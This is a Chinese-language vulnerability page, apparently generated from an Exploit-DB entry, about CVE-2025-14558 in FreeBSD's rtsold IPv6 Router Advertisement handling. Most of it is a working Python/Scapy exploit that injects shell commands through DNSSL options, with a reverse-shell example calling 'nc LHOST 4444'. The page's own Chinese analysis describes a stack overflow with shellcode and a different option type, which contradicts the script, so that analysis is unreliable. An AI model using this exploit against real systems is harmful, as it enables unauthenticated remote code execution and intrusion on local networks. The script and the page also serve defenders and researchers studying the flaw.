[webapps] FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
CVE-2025-14558
FreeBSD rtsold DNSSL选项处理存在缓冲区溢出导致远程代码执行
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-14558 |
|---|---|
| 漏洞类型 | 栈缓冲区溢出 |
| 受影响版本 | FreeBSD 15.x (rtsold组件) |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2025-12-25 |
| 提交者 | Lukas Johannes Möller |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
rtsold在处理IPv6路由器宣告(RA)消息中的DNSSL(DNS Search List)选项时,未对选项长度进行正确校验,导致在`dns_parse_domain()`函数中复制域名数据时发生栈缓冲区溢出。具体而言,选项中的域名长度字段(如`len`)可能超过实际分配的栈缓冲区大小,导致`memcpy`或字符串拷贝操作越界写入。
🎯 攻击场景
1. 攻击者与目标FreeBSD系统位于同一IPv6链路(或能伪造RA消息)。 2. 攻击者构造一个恶意的IPv6路由器宣告(RA)报文,其中包含精心构造的DNSSL选项(如超长的域名列表)。 3. 目标主机的rtsold守护进程接收并解析该RA消息,调用`dns_parse_domain()`处理域名。 4. 由于缺乏长度检查,解析函数将恶意域名数据拷贝到固定大小的栈缓冲区,覆盖返回地址或函数指针。 5. 精心设计溢出数据后,成功劫持控制流,执行攻击者指定的shellcode。
💥 漏洞影响
远程未经认证的攻击者可在同一IPv6链路触发栈缓冲区溢出,完全控制目标系统,实现远程代码执行(RCE),进一步可进行数据窃取、安装后门或横向移动。
⚔️ 原始 PoC
原始PoC未在原文中提供,但根据漏洞描述,攻击者需构造的恶意RA报文包含以下关键步骤: 1. 设置ICMPv6类型为134(路由器宣告)。 2. 在选项中添加类型25(DNSSL),并设置长度字段为超大型值(如0xFF)。 3. 在域名数据部分填充精心构造的shellcode地址及栈溢出padding,以达到控制EIP/RIP的目的。 4. 发送该RA报文至目标链路层地址。
# Exploit Author: Lukas Johannes Möller
#
# Description:
# rtsold(8) processes IPv6 Router Advertisement DNSSL options without
# validating domain names for shell metacharacters. The decoded domains
# are passed to resolvconf(8), a shell script that uses unquoted variable
# expansion, enabling command injection via $() substitution.
#
# Requirements:
# - Layer 2 adjacency to target
# - Target running rtsold with ACCEPT_RTADV enabled
# - Root privileges (raw socket for sending RA)
# - Python 3 + Scapy
#
# https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc
# https://github.com/JohannesLks/CVE-2025-14558
import argparse
import struct
import sys
import time
try:
from scapy.all import (
Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp
)
except ImportError:
sys.exit("[!] Scapy required: pip install scapy")
def encode_domain(name):
"""Encode domain in DNS wire format (RFC 1035)."""
result = b""
for label in name.split("."):
if label:
data = label.encode()
result += bytes([len(data)]) + data
return result + b"\x00"
def encode_payload(cmd):
"""Encode payload as DNS label with $() wrapper for command substitution."""
payload = f"$({cmd})".encode()
if len(payload) > 63:
# Split long payloads across labels (dots inserted on decode)
result = b""
while payload:
chunk = payload[:63]
payload = payload[63:]
result += bytes([len(chunk)]) + chunk
return result + b"\x00"
return bytes([len(payload)]) + payload + b"\x00"
def build_dnssl(cmd, lifetime=0xFFFFFFFF):
"""Build DNSSL option (RFC 6106) with injected command."""
data = encode_domain("x.local") + encode_payload(cmd)
# Pad to 8-byte boundary
pad = (8 - (len(data) + 8) % 8) % 8
data += b"\x00" * pad
# Type=31 (DNSSL), Length in 8-octet units
length = (8 + len(data)) // 8
return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data
def build_ra(mac, payload):
"""Build Router Advertisement with malicious DNSSL."""
return (
Ether(src=mac, dst="33:33:00:00:00:01")
/ IPv6(src="fe80::1", dst="ff02::1", hlim=255)
/ ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800)
/ ICMPv6NDOptSrcLLAddr(lladdr=mac)
/ ICMPv6NDOptPrefixInfo(
prefixlen=64, L=1, A=1,
validlifetime=2592000, preferredlifetime=604800,
prefix="2001:db8::"
)
/ Raw(load=build_dnssl(payload))
)
def main():
p = argparse.ArgumentParser(
description="CVE-2025-14558 - FreeBSD rtsold DNSSL Command Injection",
epilog="Examples:\n"
" %(prog)s -i eth0\n"
" %(prog)s -i eth0 -p 'id>/tmp/pwned'\n"
" %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'",
formatter_class=argparse.RawDescriptionHelpFormatter
)
p.add_argument("-i", "--interface", required=True, help="Network interface")
p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="Command to execute")
p.add_argument("-c", "--count", type=int, default=3, help="Packets to send (default: 3)")
args = p.parse_args()
try:
mac = get_if_hwaddr(args.interface)
except Exception as e:
sys.exit(f"[!] Interface error: {e}")
print(f"[*] Interface: {args.interface} ({mac})")
print(f"[*] Payload: {args.payload}")
pkt = build_ra(mac, args.payload)
for i in range(args.count):
sendp(pkt, iface=args.interface, verbose=False)
print(f"[+] Sent RA {i+1}/{args.count}")
if i < args.count - 1:
time.sleep(1)
print("[+] Done")
if __name__ == "__main__":
main()🛡️ 修复建议
更新FreeBSD至包含修复的版本(如15.1-RELEASE之后),或应用安全补丁。临时缓解措施:在不受信任的网络上禁用IPv6路由器宣告处理(如设置`net.inet6.icmp6.nd6_accept_rtadv=0`),或使用防火墙过滤不可信的RA报文。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:14 | 来源: Exploit-DB